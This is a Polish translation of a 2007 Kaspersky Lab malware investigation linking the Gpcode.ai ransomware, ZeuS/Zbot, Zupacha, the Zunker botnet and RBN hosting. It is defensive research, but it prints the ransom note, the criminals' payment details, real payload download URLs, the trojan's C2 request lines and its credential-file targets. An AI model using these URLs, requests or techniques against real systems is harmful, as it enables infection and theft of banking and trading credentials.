Stan zagrożeń w internecie znajduje się obecnie na poziomie standardowym. Nie występują duże epidemie a eksperci z Kaspersky Lab nie zanotowali żadnych poważnych incydentów związanych z bezpieczeństwem. Poziom zagrożenia: 1

Ewolucja szkodliwego oprogramowania: czerwiec - wrzesień 2007

Tagi:

Alexander Gostev
Starszy analityk wirusów, Kaspersky Lab

Vitaly Kamluk
Analityk wirusów, Kaspersky Lab

Trzeci kwartał 2007 nie był tak obfity w wydarzenia jak oczekiwaliśmy. Naturalnie szkodliwe programy nie zniknęły, a twórcy wirusów z pewnością nie zresocjalizowali się z dnia na dzień. Mimo to zdarzenia związane z zagrożeniami występowały na mniejszą skalę niż w poprzednich miesiącach czy latach.

Na osobie, która pamięta globalne epidemie wywołane przez robaki Mydoom i Lovesan, nieustający strumień niemal identycznych trojanów zalewających Internet raczej nie zrobi dużego znaczenia. Na pierwszy rzut oka wygląda na to, że szkodliwi użytkownicy cierpią na brak ambicji, zarówno jeżeli chodzi o skalę jak i innowację. Istnieje jednak proste wyjaśnienie: cyberprzestępczość staje się biznesem, dlatego obecnie cyberprzestępcy próbują unikać "radarów". Epidemie wirusowe prowadzą do śledztw wszczynanych przez organy ścigania. Ci po drugiej stronie barykady działają teraz zgodnie z hasłem, że najważniejsza jest dyskrecja, zachowując się tak cicho i nienachalnie, jak to możliwe. W takim klimacie znaczące innowacje techniczne są rzadkością. Ugrupowania przestępcze preferują teraz wypróbowane techniki i struktury. O ich działaniach dowiadujemy się zazwyczaj wtedy, gdy stają się nieostrożni. W tym wypadku pewną rolę odgrywa chciwość oraz niezbyt wielkie umiejętności techniczne.

Za co zapamiętamy trzeci kwartał 2007 roku? Za liczne incydenty związane z kradzieżą danych użytkownika. Za najnowszego trojana szantażystę. Masową histerię związaną z rosyjską firmą Russian Business Network, nazywaną przez zwykłych użytkowników 'Resident Evil' świata cybernetycznego.

Na tym tle informacja o wzrastającej liczbie botnetów związanych z Zhelatinem (Storm Worm) pozostała prawie niezauważona. Przeoczono nawet informację o tym, że botnet robaka Storm składa się z ponad 2 milionów maszyn.

Rzeczywista "linia frontu" została przesunięta na całkowicie inny poziom - jednak media nic nie wspominały o tym.

W trzecim kwartale 2007 roku wiele uwagi poświęciliśmy wydarzeniom, o których donosiły media. Badanie jednego incydentu doprowadziło nas do innych incydentów, które dopiero co zaczynały się wyłaniać; obserwatorowi z zewnątrz wydarzenia te mogły wydawać się pozbawione związku.

Najnowszy raport kwartalny nie jest standardowy. Opiera się na danych pochodzących z jednego, poważnego dochodzenia i nie tylko obejmuje istotne wydarzenia z ostatnich trzech miesięcy, ale również pokazuje, czym właściwie zajmują się analitycy wirusów.

Powrót szantażysty

Przez ponad rok nie było nowych wiadomości o szyfrujących koniach trojańskich. W zeszłym roku w naszym artykule zatytułowanym "Szantażysta" szczegółowo przedstawiliśmy, w jaki sposób firmy antywirusowe zwalczają Gpcode'a, program wykorzystujący algorytm RSA w celu szyfrowania danych użytkownika. W artykule przewidywaliśmy, że w przyszłości pojawi się większa liczba takich programów. Jednak do następnego pojawienia się programu szyfrującego, w połowie lipca 2007 roku, minął prawie rok.

Mniej więcej od 13 lipca niektórzy użytkownicy zaczęli zauważać, że ich dokumenty, zdjęcia, archiwa i pliki robocze przestały się otwierać i zawierały "cyfrowy śmietnik". Ponadto w ich systemach pojawił się plik o nazwie 'read_me.txt'. Niestety zawartość tego pliku była aż za dobrze nam znana:

Hello, your files are encrypted with RSA-4096 algorithm
(http://en.wikipedia.org/wiki/RSA).
You will need at least few years to decrypt these files without our
software. All your private information for last 3 months were
collected and sent to us.
To decrypt your files you need to buy our software. The price is $300.
To buy our software please contact us at: xxxxxxx@xxxxx.com and provide us
your personal code -XXXXXXXXX. After successful purchase we will send
your decrypting tool, and your private information will be deleted
from our system.
If you will not contact us until 07/15/2007 your private information
will be shared and you will lost all your data.
Glamorous team

[tłumaczenie na język polski: Witam, twoje pliki zostały zaszyfrowane za pomocą algorytmu RSA-4096 (http://en.wikipedia.org/wiki/RSA). Bez naszego oprogramowania będziesz potrzebował przynajmniej kilku lat, aby odszyfrować te pliki. Przez co najmniej 3 miesiące wszystkie twoje prywatne informacje były zbierane i przesyłane do nas. Aby odszyfrować swoje pliki, musisz kupić nasze oprogramowanie. Cena to 300 dolarów. Aby zakupić nasze oprogramowanie, skontaktuj się z nami na adres xxxxxxx@xxxxx.com, podając osobisty kod - XXXXXXXXX. Po skutecznym zakupie wyślemy ci twoje narzędzie deszyfrujące, a twoje prywatne informacje zostaną usunięte z naszego systemu. Jeśli nie skontaktujesz się z nami do 07/15/2007, twoje prywatne informacje zostaną udostępnione i utracisz wszystkie swoje dane. Zespół Glamorous] </pre>

Czyżby nieznany oszust powrócił? Analitycy wirusów z firmy Kaspersky Lab znali już ten adres email - użyto go w niektórych wariantach trojana LdPinch oraz bankerach - trojanach o wyraźnie rosyjskich powiązaniach.

Przeprowadzona przez nasz zespół analiza zaszyfrowanych plików pokazała, że w przeciwieństwie do tego, co podano w e-mailu, twórcy wirusów nie wykorzystali algorytmu RSA-4096, ale modyfikację algorytmu RC4. To znacznie ułatwiło nasze zadanie. W ciągu 24 godzin od wykrycia trojana szantażysty zdołaliśmy złamać klucz szyfrujący i dodać do naszych antywirusowych baz danych procedury deszyfrowania dla plików użytkownika.

Analiza tej nowej wersji Gpcode'a pokazała, że szkodnik ten posiada wiele funkcji. Oprócz szyfrowania Gpcode potrafił kraść dane użytkownika z zaatakowanej maszyny, wysyłać je na serwer zdalnego użytkownika oraz pobierać z niego określone pliki.

Wszyscy zdawaliśmy sobie sprawę, że trojany wymuszające hasła stanowią poważne zagrożenie, i postanowiliśmy bardziej szczegółowo zbadać najnowszy szkodliwy program o nazwie Gpcode.ai. Okazało się, że była to bardzo trafna decyzja.

Na tropie Gpcode.ai

Postanowiliśmy skupić się na trzech głównych obszarach:

  1. serwerze, na który trojan wysyłał dane i z którego pobierał pliki
  2. adresie email podanym w wiadomości pozostawionej na zaatakowanych maszynach
  3. ciągu tekstowym zawartym w ciele trojana - "_SYSTEM_64AD0625_"

Serwer

Ustaliliśmy, że Gpcode.ai łączył się z serwerem za pomocą umieszczonego tam skryptu s.php. Ponadto, pobierał z serwera plik o nazwie cfg.bin. Plik ten stanowił zaszyfrowany zestaw instrukcji dotyczących tego, jakie informacje powinny zostać przechwycone z zaatakowanej maszyny (dane o koncie dla szeregu systemów płatniczych oraz bankowości).

Szkodnik ten analizowany był przez kilka firm antywirusowych. Alarm podnieśli przedstawiciele PrevX, którzy na serwerze szkodliwego użytkownika wykryli pliki pochodzące z 494 zaatakowanych maszyn. Firma ta podała następnie do wiadomości, że wśród ofiar szantażysty znajdowało się wiele dużych firm. Mel Morris, dyrektor generalny PrevX, ujawnił nawet ich nazwy: American Airlines, Booz Allen Hamilton oraz Amerykański Departament Stanu. Żadna z ofiar nie zdecydowała się skomentować decyzji Morrisa o ujawnieniu tych informacji.

Branża nie pochwalała tego kroku PrevX. David Perry z Trend Micro powiedział, że postanowienie PrevX o ujawnieniu szczegółów zaniepokoiło jego firmę. Największe firmy antywirusowe próbowały unikać podawania jakichkolwiek informacji (takich jak serwer czy adresy e-mail) dotyczących szkodliwych użytkowników, zatajając te szczegóły również w publikowanych opisach wirusa (mimo że nie zawsze im się to udawało - zobacz nasz weblog). Jednak PrevX zdradził całemu światu nie tylko to, gdzie można uzyskać dostęp do prywatnych danych, ale również do kogo one należą.

Prawdziwą obławę przeżywał martin-golf.net - odwiedzany przez ekspertów ds. bezpieczeństwa, hakerów, przedstawicieli organów ścigania z różnych państw, jak również zwykłych ciekawskich. Badanie, które mogłoby zostać przeprowadzone, zostało przerwane - szkodliwi użytkownicy wiedzieli, że są obserwowani i pozwolili, aby obserwujący obserwowali obserwujących, a nie przestępców.

Z tego powodu ta linia śledztwa nie mogła przynieść rezultatów. Dlatego naszą uwagę skierowaliśmy na adres email.

Email

Chcieliśmy dowiedzieć się, jak dokładnie wyglądała korespondencja między cyberprzestępcą a użytkownikiem skłonnym zapłacić pieniądze za przywrócenie swoich danych. Na jeden z adresów z programu trojańskiego wysłaliśmy wiec email o następującej treści: "Nazywam się John Brown. Moje ważne dane zostały zaszyfrowane. Dane te są mi pilnie potrzebne do opracowania raportu. Jeśli go nie skończę, mój szef mnie zabije". Następnego dnia otrzymaliśmy następującą odpowiedź od nieznanego szkodliwego użytkownika:

Sorry for delay.

Please transfer $500 to e-gold account 4616329 and send us a e-mail to
address oxyglamour@gmail.com. You can buy e-gold with paypal with help of
exchange site listed on official e-gold site (http://www.e- 
gold.com/unsecure/links.htm#marketmaker).
After that, we will send your personal decoding program immediately

[tłumaczenie na język polski: Przepraszam za zwłokę. Proszę o przelanie 500 dolarów na konto e-gold nr 4616329 oraz wysłanie wiadomości email na adres oxyglamour@gmail.com. Możesz kupić e-gold za pomocą paypala za pośrednictwem strony wymienionej na oficjalnej stronie e-gold (http://www.e-gold.com/unsecure/links.htm#marketmaker)]. </pre>

Jak widać z powyższego tekstu, autorzy Gpcode.ai nie prosili o 300 dolarów - jak żądano w wiadomości pozostawionej przez trojana - ale o 500 dolarów. Pieniądze te miały zostać przelane za pośrednictwem e-gold, ulubionego systemu płatności cyberprzestępców. Ponadto został podany numer konta, na które należało przelać pieniądze.

Wraz z tym mailem ta linia śledztwa utknęła w martwym punkcie.

Ciąg "_SYSTEM_64AD0625_"

Jedyną rzeczą, jaka pozostała, było ustalenie, jakie inne szkodliwe programy mogły zostać stworzone przez grupę przedstawiającą się jako "Glamourous team". Zaczęliśmy więc przeszukiwać naszą kolekcję wirusów w celu znalezienia następującego ciągu: "_SYSTEM_64AD0625_"

Rezultaty były zaskakujące. Muteks ten znaleźliśmy w wielu różnych rodzajach trojanów - trojanach downloaderach, trojanach szpiegujących oraz backdoorach.

Wspólną cechą wszystkich tych próbek była nazwa pliku, który szkodliwe programy zainstalowały na zaatakowanej maszynie: ntos.exe, dokładnie tej samej nazwy pliku używał Gpcode.ai. Oprócz tego, szkodliwe programy znalezione w kolekcji zawierały pliki o nazwie sporder.dll oraz rsvp322.dll i tworzyły podkatalog o nazwie wsnpoem, zawierający pliki o nazwach audio.dll oraz video.dll w katalogu systemu Windows.

Szczegółowa analiza wybranych plików pokazała, że oprócz tego, że zawierały one ten sam muteks, ich kod był w ponad 80% identyczny!

"Uniwersalny" kod

Wydawało się, że natrafiliśmy na uniwersalny kod. Kod ten miał na celu nie tylko kradzież danych oraz instalowanie nowych trojanów na zaatakowanej maszynie. Miał również działać jak bot i przyłączać zaatakowaną maszynę do sieci zombie.

Szkodliwe programy wykorzystujące ten "uniwersalny" kod posiadały pojedynczy komponent oraz niewielką (w porównaniu z całkowitym rozmiarem pliku), unikatową funkcję różniącą się w zależności od wersji. Interesujące jest to, że niektóre z tych programów wykryliśmy jeszcze pod koniec 2006 r. Przy pomocy tego "uniwersalnego" kodu stworzono również Gpcode.ai.

Nowe wpisy i zależności między nimi znacznie rozszerzyły diagramy, które wykorzystywaliśmy w naszym śledztwie.


1107_q3_threats_pict1_s.png



Zła firma

Kolejnym etapem w naszym badaniu było przeanalizowanie odsyłaczy w próbkach zawierających "uniwersalny" kod. Z wykrytego niedawno pliku wydobyliśmy cztery odsyłacze - odsyłacze, które posłużyły szkodliwemu programowi do dostarczenia swojej szkodliwej funkcji:

http://81.95.149.28/logo/zeus.exe
http://81.95.149.28/logo/zupa.exe
http://myscreensavers.info/zupa.exe
http:/81.95.149.28/logo/fout.php

Co robi ten trojan? Przede wszystkim instaluje się na zaatakowanej maszynie jako ntos.exe, następnie pobiera pliki o nazwie zeus.exe (http://81.95.149.28/logo/zeus.exe) oraz zupa.exe (http://81.95.149.28/logo/zupa.exe), łącząc się poprzez skrypt o nazwie fout.pho (http:/81.95.149.28/logo/fout.php) w celu zidentyfikowania siebie w botnecie. Trojan pobiera cfg.bin, zaszyfrowany plik konfiguracyjny. Plik ten zawiera wiadomość tekstową oraz odsyłacze do innych stron. Następnie szkodnik zaczyna śledzić aktywność użytkownika i gdy ten odwiedzi jakiekolwiek fora, księgi gości czy blogi, trojan dołącza swój własny tekst (wydobyty z cfg.bin i zawierający odsyłacze do szkodliwego pliku (http://myscreensavers.info/zupa.exe)) do wiadomości użytkownika:


1107_q3_threats_pict2_s.png


Skorzystaliśmy z Google, aby znaleźć podobne przykłady... bez trudu trafiliśmy na wiele:


1107_q3_threats_pict3_s.png


Konstruowanie ataku w ten sposób pozwala autorom trojanów wykorzystać zainfekowane wcześniej maszyny w celu rozprzestrzeniania nowych wariantów szkodliwego programu i/lub zwiększenia liczby zainfekowanych komputerów. Przykład ten jasno pokazuje, w jaki sposób szkodliwi użytkownicy odchodzą od tradycyjnych wektorów infekcji (np. wysyłanie szkodliwych programów za pośrednictwem poczty elektronicznej), wykorzystując do rozprzestrzeniania swoich tworów moc Internetu.

Jakie szkodliwe programy wykorzystywał do rozprzestrzeniania się analizowany przez nas trojan? Poniższe dane ukazują interesujący obraz:



Są to oddzielne rodziny. Na pierwszy rzut oka nie mają ze sobą nic wspólnego i z początku sądzono, że zostały napisane przez różne grupy twórców szkodliwego oprogramowania. Jednak rozprzestrzeniały się z tej samej strony i przy pomocy tego samego trojana downloadera. Co więcej w pewien sposób są one związane z trojanem Gpcode.ai!

Do końca nie było wiadomo, co to znaczy. Zaczęliśmy podejrzewać istnienie międzynarodowej grupy zamieszanej w tworzenie i rozprzestrzenianie ogromnej większości dzisiejszych szkodliwych programów.

Nasze najgorsze obawy potwierdziły się, gdy przeanalizowaliśmy botnet, który został stworzony przy użyciu Bzuba. Stało się jasne, że trojan, nazwany przez swojego autora Zupacha, był bezpośrednim krewnym Bzuba. Bzub oraz Zupach to prawie identyczne programy, jednak Bzub posiada funkcję trojana szpiegującego, Zupacha natomiast jej nie posiada.

Bzub/ Zupacha są klientami bota zarządzanymi przez system botnetu Zunker.

Istnieje jeszcze inny szkodliwy program związany z botnetem Zunker: Email-Worm.Win32.Zhelatin.bg. Jest to jeden ze sławnych robaków Storm, które od początku 2007 roku zalewają ruch pocztowy. W celu rozprzestrzeniania się robaki te wykorzystują zaawansowane metody socjotechniki.

Podsumowując: Zhelatin, Warezov, Bancos.aam, Bzub, a teraz Gpcode.ai są ze sobą powiązane. Programy te pochodzą z różnych rodzin, jednak rodziny te należą do jednych z najaktywniejszych i najniebezpieczniejszych szkodliwych programów w tym momencie. Pliki o takich nazwach, jak ntos.exe, video.dll, audio.dll, sporder.dll, lcewza.exe, filech.exe, filede.exe, iphone.scr, ldr.exe, ldr2.exe, loader.exe, pajero.exe, update92520748.exe, zeus.exe, zs1.exe są dobrze znane analitykom wirusów na całym świecie.

Powiązania między trojanami przedstawiają się w następujący sposób:


1107_q3_threats_pict4_s.png


W czasie gdy prowadziliśmy nasze dochodzenie, nieznani szkodliwi użytkownicy stali się całkowicie znani. Mówiąc ściślej, nie próbowali zwrócić na siebie uwagi, jednak wydarzenia, jakie nastąpiły, okazały się bardzo znaczące.


Broker

25 lipca 2007 r. (zaledwie 10 dni po pojawieniu się Gpcode.ai) analitycy z firmy Kaspersky Lab zauważyli aktywne rozprzestrzenianie się nowego szkodliwego programu. Jego ofiarą padli użytkownicy kilku najpopularniejszych rosyjskich stron informacyjnych - utro.ru, gzt.ru, rbc.ru.

Stało się jasne, że otworzyli oni odsyłacz (http://www.txt.utro.ru/cgi- bin/banner/rian?86028&options=FN) w systemie banerowym Utro.ru, który zawierał odsyłacz do zainfekowanej strony (http://81.95.145.210/333/m00333/index.php). Stronę tę hostowała firma RBN (Russian Business Network).

Po otwarciu tej strony, przeglądarka użytkownika była atakowana przy użyciu kolekcji eksploitów (w tym przypadku, Mpack). Gdyby atak powiódł się, na zaatakowaną maszynę zostałby pobrany trojan downloader. Program ten zainstalowałby z kolei inny szkodliwy program - Trojan-Spy.Win32.Bancos.aam.

Po zainstalowaniu się w systemie trojan zacząłby wykonywać następujące polecenia:

Host: 81.95.149.66
GET /e1/file.php HTTP/1.1
GET /ldr1.exe HTTP/1.1
GET /cfg.bin HTTP/1.0
POST /s.php?1=april_002fdf3f&i= HTTP/1.0

W rezultacie, na zaatakowanej maszynie pojawiłby się plik o nazwie ntos.exe (nazwa dobrze znana analitykom wirusów). Plik ten wykorzystywany był do instalowania Gpcode.ai w systemie. Spodziewając się najgorszego, w postaci nowego programu szyfrującego, zaczęliśmy szczegółowo analizować ten plik.

Okazało się jednak, że program ten nie jest wariantem Gpcode. Ta nowa wersja Bancos.aam była pierwszym trojanem szpiegującym stworzonym w celu kradzieży danych użytkowników rosyjskiego systemu QUIK.

QUIK jest pakietem aplikacji zapewniającym dostęp online do systemów giełd papierów wartościowych. Składa się z aplikacji po stronie serwera oraz terminala po stronie klienta, które komunikują się ze sobą za pośrednictwem Internetu.

Uzyskiwanie przez cyberprzestępców dostępu do kont bankowych to zjawisko występujące już od dłuższego czasu. Jednak kradzież danych umożliwiających dostęp do internetowych giełd papierów wartościowych to coś nowego.

Trojan ten skanował zaatakowaną maszynę w poszukiwaniu plików o nazwie secring.txk, pubring.txk oraz qcrypto.cfg zawierających zapisane parametry dostępu do systemu QUIK. Dane z tych plików wysyłane były następnie z powrotem na serwer.

Wiedząc dokładnie, jakich plików szukał program szpiegujący, po raz kolejny przeszukaliśmy naszą kolekcje wirusów. Znaleźliśmy kolejne pięć wariantów trojana, z których pierwszy pochodził z początków lipca. W rezultacie, wszystkie te programy zostały zaklasyfikowane do nowej rodziny o nazwie Trojan-PSW.Win32.Broker.

Trojany te wykazywały zadziwiające podobieństwo do trojana Gpcode.ai pod względem kodu. Różnice polegały na tym, że jeden kradł dane, drugi szyfrował dane. Po raz kolejny natrafiliśmy na "uniwersalny" kod.


Wstępne wyniki

Do pierwszego sierpnia ustaliliśmy następujące fakty:

  • Gpcode.ai wykorzystywał "uniwersalny" kod i kontaktował się ze stroną martin-golf.net
  • Bancos.aam wykorzystywał "uniwersalny" kod i pobierał pliki hostingowane przez firmę Russian Business Network (RBN)
  • Niektóre z botnetów Zunkera, które już wykryliśmy, były hostingowane w zasobach RBN
  • Botnety Zunkera działają jak centra dowodzenia dla downloaderów, które pobierają programy podobne do Bancos.aam/Gpcode.ai
  • Wśród szkodliwych programów, które mogą być zarządzane przez Zunkera, znajduje się downloader Zunker, program szpiegujący Bzub i prawdopodobnie robak Zhelatin (Storm)
  • Jeden z takich botnetów został wykorzystany do rozprzestrzeniania robaka Warezov

1107_q3_threats_pict5_s.png

Wciąż jednak brakowało nam jednego kawałka układanki - kim był autor "uniwersalnego" kodu, tak powszechnie wykorzystywanego w tak wielu różnych szkodliwych programach? Czy za te wszystkie incydenty odpowiedzialna była ta sama grupa twórców wirusów?

Wiele czasu poświęciliśmy na czytanie różnych stron oraz forów hakerskich, w większości w języku rosyjskim. Stopniowo sytuacja zaczynała się wyjaśniać.


W poszukiwaniu "uniwersalnego" kodu

Zunker oraz Zupacha

Czym więc zajmowaliśmy się przez cały ten czas? Strony hakerskie aktywnie sprzedawały pakiet Zunker+Zupacha - centrum dowodzenia botnetu oraz klient bota. To już wiedzieliśmy. Interesującym odkryciem było to, ile pieniędzy nieznani autorzy systemu bota żądali za swój pakiet: do 3000 dolarów. Od czasu do czasu pojawiały się oferty "dwa w jednej cenie" w wysokości około 200 dolarów. Takie oferty składali prawdopodobnie inni właściciele kodu źródłowego pakietu trojanów.

My jednak nie mieliśmy żadnych problemów z uzyskaniem plików Zunkera oraz Zupacha za darmo, znając adresy niektórych aktywnych botnetów. Wystarczyło skorzystać z Google.

Funkcje Zupacha okazały się groźne. Oprócz pobierania plików na zaatakowaną maszynę, głównym zadaniem tego programu jest dalsze rozprzestrzenianie się. Opisaliśmy już jeden ze sposobów jego rozprzestrzeniania się (poprzez zamieszczanie swoich tekstów w wiadomościach na forach). Ogólnie, Zupacha potrafi rozsyłać swoje odsyłacze przy użyciu technik spamowych w następujący sposób:

  • Spam ICQ/Jabber: Teksty z odsyłaczami do zainfekowanych stron dodawane są do wszystkich wiadomości, które ofiara wymienia ze swoimi kontaktami za pośrednictwem tych klientów komunikatorów internetowych.
  • Spam WWW: Teksty dodawane są do każdego formularza internetowego wypełnionego przez użytkownika. Z reguły są to formularze znajdujące się na forach oraz interfejsach sieciowych systemów pocztowych.
  • Spam email: Teksty dodawane są do wiadomości email.

Należy zauważyć, że w zaprezentowanych wyżej przypadkach Zupacha nie inicjuje masowej wysyłki wiadomości. Monitoruje jedynie aktywność użytkownika i dodaje swoje teksty do każdej wiadomości wychodzącej - w taki sposób, żeby użytkownik ich nie zauważył! Celem tej funkcji jest utrudnienie wykrycia infekcji.

Jednak Zupacha nie kradnie danych - jest to jedynie samodzielnie rozprzestrzeniający się trojan downloader. Dlatego też, nie może być niesławnym "uniwersalnym" kodem.

Odpowiedź na nasze pytanie otrzymaliśmy po dalszej analizie ofert hakerów dotyczących szkodliwych programów: "uniwersalny" kod, który został wykorzystany w setkach wariantów Bancos.aam, Gpcode.ai oraz Broker okazał się botem ZeuS (nazwa użyta przez samego autora).


ZeuS - Zbot

Zgromadzone przez nas dane dotyczące wariantów ZeuS, które już posiadaliśmy, plus dochodzenia przeprowadzone w Internecie, pozwoliły nam uzyskać prawie pełny obraz tego programu.

Zacznijmy od faktu, że bot został pierwotnie stworzony w celu odsprzedaży każdemu, kto chciałby go kupić, oraz skonfigurowania zgodnie z życzeniami klienta. Autor programu nie oferował "wsparcia technicznego" osobom, które go zakupiły, zlecając tą funkcję innym. Po rozgłosie wokół Gpcode.ai oraz Broker wydaje się, że autor uznał, że jego twór za bardzo zwrócił na siebie uwagę i organy ścigania wykazywały zbyt wielkie zainteresowanie nim. Ogłosił więc, że sprzedaż programu została zakończona.


1107_q3_threats_pict6_s.png


Powyższy zrzut ekranu pokazuje rozmowę, w której autor programu wyjaśnia, że program nie jest już na sprzedaż, jednak "starzy klienci" nadal będą otrzymywali wsparcie.

Historia ta przypomina zdarzenia, jakie miały miejsce pod koniec zeszłego roku, gdy na skutek incydentów związanych z kradzieżą danych klientów banku Nordea usłyszeliśmy o trojanie Nuclear Grabber z bardzo podobną funkcjonalnością. Na pewnym etapie trojan ten był sprzedawany za 3 000 dolarów, a jego autor, Corpse, udzielił nawet wywiadu jednemu z dziennikarzy. Corpse ogłosił następnie na swojej stronie, że "wycofuje się z biznesu", że cały kod źródłowy został zniszczony wraz z dyskiem twardym i że nie będzie już dłużej tworzył ani wspierał szkodliwych programów.

W przypadku ZeuS, scenariusz był bardzo podobny. Mimo że pod koniec lipca autor zamknął sklep, konstruktor nadal krążył wśród hakerów. Umożliwiał on tworzenie nowych wariantów bota z określonymi funkcjami. Kilka rywalizujących ze sobą grup zaczęło sprzedawać i rozprzestrzeniać te nowe warianty.

Początkowo ZeuS posiadał stosunkowo ograniczoną funkcjonalność bota - pobierał jedynie inne pliki do systemu. Z czasem jednak jego funkcjonalność została rozszerzona. Nie wiemy, czy dokonał tego sam autor, czy też te nowe funkcje zaimplementowali nowi "właściciele" kodu źródłowego. Najistotniejszą innowacją było pojawienie się uniwersalnego "interfejsu" w ZeuS, który pozwalał programowi na łączenie się z botnetem Zunker (podobnie jak Zupacha), otrzymywanie instrukcji za pośrednictwem pliku cfg.bin i wykonywanie ich w locie.

Stworzyliśmy program do deszyfrowania niektórych plików cfg.bin. Okazało się, że pliki te zawierały adresy online różnych banków i systemów płatności. Właściciele botnetu mogli szybko dodać adresy nowych celów, aby śledzić aktywność użytkownika i przechwytywać dane.

Oprócz standardowych procedur (takich jak instalowanie się na zaatakowanej maszynie, wstrzykiwanie własnego kodu do uruchamianych procesów, zwalczanie niektórych rozwiązań antywirusowych), bot posiadał również rozbudowaną funkcjonalność kradzieży danych:

  • Trojan przechwytuje zawartość Pamięci Chronionej (Protected Storage), która zawiera zapisane hasła użytkownika.
  • "Form grabber". Trojan przechwytuje wszystkie dane wprowadzane do formularza przesyłanego za pośrednictwem przeglądarki. Lista monitorowanych adresów składa się, z reguły, z banków i systemów płatności. W ten sposób kradzione są konta bankowe.
  • Omijanie wirtualnych klawiatur. Trojan przechwytuje wciśnięcia przycisków myszy i wykonuje zrzuty ekranu podczas przechwytywania danych.
  • Fałszowanie witryn i stron. Jest to bardzo interesująca metoda, wykorzystywana wcześniej w Nuclear Grabber. Gdy użytkownik próbuje skontaktować się z jedną ze stron monitorowanych przez trojana w celu przechwytywania danych, żądanie jest przekierowywane na stronę phishingową lub do oryginalnej strony dodawane jest nowe pole wprowadzania danych. Zawartość strony jest modyfikowana na komputerze użytkownika, zanim strona zostanie wyświetlona przez przeglądarkę.
  • Kradzież certyfikatów.

1107_q3_threats_pict7.png


Cechą rozpoznawczą ZeuS, dzięki której bardzo szybko odnaleźliśmy jego warianty w naszej kolekcji, jest muteks tworzony w celu zaznaczenia swojej obecności w pamięci: _SYSTEM_

Na przykład:

__SYSTEM__91C38905__
__SYSTEM__64AD0625__
__SYSTEM__23D80F10__
__SYSTEM__7F4523E5__
__SYSTEM__45A2F601__

Dzięki temu mogliśmy sklasyfikować wszystkie warianty ZeuS do oddzielnej rodziny o generycznej nazwie Zbot.

To właśnie jest ten "uniwersalny" kod; wykorzystuje on wiele oryginalnych metod w celu kradzieży wszelkiego rodzaju danych. Najniebezpieczniejsze jest to, że do każdego nowego warianta można dodać wiele innych funkcji, tak jak w przypadku Gpcode.ai.


Trzy Z

Teraz wszystko stało się jasne. W rezultacie, rosyjska społeczność cyberprzestępców stosuje standardowy pakiet: zestaw Zupacha+ZeuS oraz zarządzany przez ten zestaw botnet Zunker.

Rozmiar sieci zombie stworzonych przy użyciu tych programów jest imponujący. Jedna z największych sieci, stworzona przy użyciu Zunker, składała się w momencie wykrycia z 106000 zaatakowanych maszyn - co 24 godziny dodawanych było 1 500 nowych komputerów. Zupacha potrafił bardzo skutecznie się rozprzestrzeniać, ponieważ centrum dowodzenia botnetu jest łatwe w konfiguracji i użyciu.

Każdy szkodliwy użytkownik, nawet "dzieciak skryptowy", mógłby kupić te dwa trojany (ZeuS oraz Zupacha) skonfigurowane specjalnie dla konkretnego klienta. Następnie musiał wynająć serwer i zainstalować Zunkera (panel sterujący botnetu). Naturalnie w wielu przypadkach wybraną firmą hostingową była Russian Business Network, o której przez ostatnie sześć miesięcy donosiły media, i która zyskała na Zachodzie reputację podobną do tej, jaką cieszyła się Umbrella Corporation w grze video Resident Evil.


1107_q3_threats_pict8.png


Interesowała nas nie tyle RBN co jej klienci oraz wykorzystywane przez nich botnety. Ponieważ wiedzieliśmy, gdzie i czego szukać łatwo zidentyfikowaliśmy kilka takich systemów (zobacz wykres powyżej).

Jesteśmy pewni, że niektóre z botnetów Zunker wykorzystywane były do rozprzestrzeniania niebezpiecznych szkodliwych programów, takich jak Zhelatin (robak Storm) oraz Warezov. Ich autorzy mogli celowo wykorzystać Zunker+Zupacha do stworzenia tych botnetów lub też wydzierżawić moc istniejących już botnetów, płacąc właścicielom za rozprzestrzenianie swych szkodników.

Warto zauważyć, że gdy Zupacha wpadł w ręce hakerów z Zachodu, ci zachwycali się koncepcją, analizowali kod i dyskutowali na jego temat na forach (http://www.1918.com). Chociaż nie mieli kodu źródłowego, nauczyli się, w jaki sposób można zmodyfikować adres centrum dowodzenia w pliku binarnym trojana, aby wykorzystać go do swoich własnych celów. Próbowali nawet sami stworzyć centrum dowodzenia zawierające bazę danych, w której zapisana została konfiguracja trojana. Później, jeden z tych hakerów znalazł kod centrum dowodzenia oraz strukturę bazy danych i wszystko potoczyło się bardzo szybko. Osoby zaangażowane w to (analizowanie rosyjskiego trojana oraz wykorzystywanie "broni rosyjskiej mafii") brały udział w rozwijaniu, rozprzestrzenianiu oraz popularyzacji Zupacha.


Wnioski

Powyższe informacje obrazują, w jaki sposób cyberprzestępcy (w szczególności rosyjscy) działają zespołowo. Poszczególni twórcy wirusów oraz ich grupy tworzą programy trojańskie na sprzedaż. Ci, którzy je kupują, konfigurują je zgodnie z własnymi potrzebami, w efekcie czego oryginalny program jest często trudny do rozpoznania. Zainfekowane maszyny połączone są w botnety, które mogą składać się z setek tysięcy maszyn. Maszyny te są zarządzane poprzez centrum dowodzenia - kodu stworzonego przez innych szkodliwych użytkowników, który również jest na sprzedaż. Botnety te mogą być wykorzystywane do rozprzestrzeniania szeregu różnych szkodliwych programów, które często bezpośrednio konkurują ze sobą. Aby cała ta struktura miała jak najdłuższy cykl życia, mimo wszystkich wysiłków firm antywirusowych oraz organów ścigania, istnieją wyspecjalizowane firmy hostingowe oferujące swoje usługi po cenach od kilkudziesięciu do tysięcy dolarów miesięcznie.

Przemysł ten naturalnie przynosi pewne zyski, ponieważ istnieje nie tylko zapotrzebowanie na tworzenie i rozprzestrzenianie trojanów, ale również podaż. Nasze badanie skoncentrowało się jedynie na części góry lodowej: tej złożonej z rosyjskojęzycznych grup hakerów. Naturalnie istnieją też inne grupy - z Ameryki Południowej, Chin, Turcji itd. Każda z tych grup posiada własny sposób działania i charakter, są jednak stosunkowo do siebie podobne. W Internecie nie ma żadnych granic.

Ostatnim przykładem może być artykuł, który pojawił się 17 sierpnia w InformationWeek. W artykule tym Don Jackson, ekspert ds. bezpieczeństwa w SecureWorks, powiedział, że zidentyfikował 12 schowków danych, z których większość zawierała od czterech do sześciu tysięcy skradzionych wpisów. W sumie, skradzione zostały dane około 100 000 osób. Dane te zostały skradzione przez trojany zawarte w fałszywych reklamach na dwóch największych stronach rekrutacyjnych, z których jedna to Monster.com.

Prawdopodobnie odgadliście już, o jakim trojanie mówił Jackson, i gdzie szkodnik ten wysłał przechwycone dane. Tak, macie rację! To ZeuS, "uniwersalny" kod, który wysłał dane do Russian Business Network.